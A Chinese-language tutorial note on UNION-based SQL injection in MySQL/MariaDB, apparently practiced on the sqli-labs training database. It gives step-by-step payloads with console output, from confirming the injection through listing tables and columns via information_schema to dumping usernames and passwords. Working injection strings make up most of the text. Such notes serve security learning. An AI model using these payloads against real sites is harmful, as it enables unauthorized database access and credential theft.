MySQL_union联合查询

MySQL_union联合查询笔记

union联合查询

select * from users where id = '注入点';

  • 判断确定注入
'
"
\ (转义符)
and 1=1 --+ / and 1=2 --+
-1/+1 //注:'+'在URL中有特殊含义,因此需要URL编码为 %2b
%df' //宽字节
  • 判断列数
payload:
---
' order by 3 --+ 正常
' order by 4 --+ 异常
说明该查询结果有3列(此处为 select *,即 users 表的全部列)
---

MariaDB [security]> select * from users where id = '1' order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = '1' order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
MariaDB [security]>
  • 寻找显示位
//改负值法
MariaDB [security]> select * from users where id = '-1' union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.01 sec)

payload:
---
-1' union select 1,2,3 --+
---


//超大数值法
MariaDB [security]> select * from users where id = '9999' union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

payload:
---
9999' union select 1,2,3 --+
---


//否定法
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,3 --+
---

偶然发现,延时可以导致前面数据查询为空(sleep() 正常执行完成后返回 0,使 and 条件为假):

MariaDB [security]> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and sleep(5);
Empty set (5.00 sec)

MariaDB [security]> select * from users where id = 1 and sleep(5) union select 1,version(),3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | 5.5.65-MariaDB | 3 |
+----+----------------+----------+
1 row in set (5.00 sec)

MariaDB [security]>

  • 查看数据库信息
//查看当前数据库版本 version() / @@version
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,version(),3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | 5.5.65-MariaDB | 3 |
+----+----------------+----------+
1 row in set (0.00 sec)

payload:
---
' and 1=2 union select 1,version(),3 --+
---


MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,@@version,3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | 5.5.65-MariaDB | 3 |
+----+----------------+----------+
1 row in set (0.00 sec)

payload:
---
' and 1=2 union select 1,@@version,3 --+
---


//查看当前登录账户 user()
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,user(),3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | root@localhost | 3 |
+----+----------------+----------+
1 row in set (0.00 sec)

payload:
---
' and 1=2 union select 1,user(),3 --+
---


//查看当前连接数据库 database()
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,database(),3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | security | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]>

payload:
---
' and 1=2 union select 1,database(),3 --+
---


//数据库路径 @@datadir
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,@@datadir,3;
+----+-----------------+----------+
| id | username | password |
+----+-----------------+----------+
| 1 | /var/lib/mysql/ | 3 |
+----+-----------------+----------+
1 row in set (0.01 sec)

payload:
---
1' and 1=2 union select 1,@@datadir,3 --+
---

//操作系统版本 @@version_compile_os
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,@@version_compile_os,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Linux | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]>

payload:
---
' and 1=2 union select 1,@@version_compile_os,3
---

  • 查表名
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security";
+----+----------+-------------------------------+
| id | username | password |
+----+----------+-------------------------------+
| 1 | 2 | emails,referers,uagents,users |
+----+----------+-------------------------------+
1 row in set (0.01 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security" --+
---

---
' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+
---

---
1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "数据库名" --+
---
  • 查列名
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = database();
+----+----------+----------------------+
| id | username | password |
+----+----------+----------------------+
| 1 | 2 | id,username,password |
+----+----------+----------------------+
1 row in set (0.01 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = database() --+
---

---
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "表名" and table_schema = database() --+
---

数据库/表名可以用hex编码(例如 0x7573657273 即 "users",0x7365637572697479 即 "security")

MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 0x7573657273 and table_schema = 0x7365637572697479;
+----+----------+----------------------+
| id | username | password |
+----+----------+----------------------+
| 1 | 2 | id,username,password |
+----+----------+----------------------+
1 row in set (0.00 sec)

MariaDB [security]>

MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273 and table_schema = 0x7365637572697479);
+----+----------+----------------------+
| id | username | password |
+----+----------+----------------------+
| 1 | 2 | id,username,password |
+----+----------+----------------------+
1 row in set (0.00 sec)

MariaDB [security]>
  • 查数据
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,concat_ws("~",username,password) from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | 2 | Dumb~Dumb |
| 1 | 2 | Angelina~I-kill-you |
| 1 | 2 | Dummy~p@ssword |
| 1 | 2 | secure~crappy |
| 1 | 2 | stupid~stupidity |
| 1 | 2 | superman~genious |
| 1 | 2 | batman~mob!le |
| 1 | 2 | admin~admin |
| 1 | 2 | admin1~admin1 |
| 1 | 2 | admin2~admin2 |
| 1 | 2 | admin3~admin3 |
| 1 | 2 | dhakkan~dumbo |
| 1 | 2 | admin4~admin4 |
+----+----------+---------------------+
13 rows in set (0.00 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,concat_ws("~",username,password) from users --+
---

---
1' and 1=2 union select 1,2,concat_ws("~",字段1,字段2) from 表名 --+
---